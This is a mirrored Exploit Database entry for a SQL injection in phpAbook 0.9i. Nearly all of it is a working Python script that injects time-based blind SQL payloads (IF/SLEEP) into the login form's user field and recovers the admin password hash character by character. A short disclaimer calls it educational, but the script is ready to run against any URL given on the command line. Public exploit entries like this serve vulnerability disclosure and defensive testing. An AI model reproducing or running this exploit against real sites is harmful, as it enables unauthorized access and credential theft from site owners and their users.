phpAbook 0.9i – SQL Injection

• Exploit Database
• 106 阅读

• 作者： Alejandro Perez
  日期： 2021-06-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50071/

• # Exploit Title: phpAbook 0.9i - SQL Injection
  # Date: 2021-06-29
  # Vendor Homepage: http://sourceforge.net/projects/phpabook/
  # Exploit Author: Said Cortes, Alejandro Perez
  # Version: v0.9i
  # This was written for educational purpose. Use it at your own risk.
  # Author will be not responsible for any damage.
  
  import requests
  import argparse
  import string
  import sys
  
  
  def exploit(session,host):
  print("Starting Exploit\nSearching Admin Hash...")
  passwordhash = ''
  for i in range(1,33):
  charset = string.digits + string.ascii_lowercase
  for letter in charset:
  burp0_url = f"{host}/index.php"
  burp0_data = {"auth_user": f"admin'-IF((SELECT MID(password,{i},1) from ab_auth_user where uid=1)='{letter}',SLEEP(3),0)#", "auth_passwd": "admin", "lang": "en", "submit": "Login"}
  try:
  session.post(burp0_url, data=burp0_data, timeout=1)
  except requests.Timeout:
  passwordhash += letter
  continue
  print("admin:"+passwordhash)
  
  
  
  
  if __name__ == "__main__" :
  session = requests.session()
  parser = argparse.ArgumentParser()
  parser.add_argument("-u","--url",help="host url \nex: http://127.0.0.1/phpabook",required=True)
  arg = parser.parse_args()
  exploit(session,arg.url)
  

  Python

  Copy